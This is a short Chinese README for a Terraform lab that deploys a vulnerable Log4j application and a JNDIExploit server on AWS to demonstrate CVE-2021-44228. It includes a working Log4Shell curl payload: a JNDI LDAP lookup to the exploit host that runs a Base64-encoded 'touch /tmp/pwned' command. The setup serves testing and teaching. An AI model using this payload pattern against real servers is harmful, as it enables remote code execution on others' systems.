一个用于部署易受攻击应用及配合 CVE-2021-44228 使用的 JNDIExploit 的 Terraform 配置
该 Terraform 在 AWS 云的一个 VPC 中创建两个实例。
你只需要导出你的 AWS_ACCESS_KEY_ID 和 AWS_SECRET_ACCESS_KEY
其中一个实例是 JNDIExploit。
另一个是用于 log4j 漏洞利用的 Vulnerable-App
请在 apply 之前替换 terraform 中的 SSH 公钥
terraform init
terraform plan
terraform apply --auto-approve
在 AWS 上部署完成后,你可以通过 curl 请求对其进行漏洞利用,并验证 vulnerable-app 容器中 /tmp 目录下的文件是否已创建。
curl ${vulnerable-app-IP}:8090 -H 'X-Api-Version: ${jndi:ldap://${JNDIExploit-IP}:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'
在易受攻击的应用服务器上运行以下命令来验证命令执行情况,你应该会看到 pwned 文件
sudo docker exec -ti vulnerable-app ls /tmp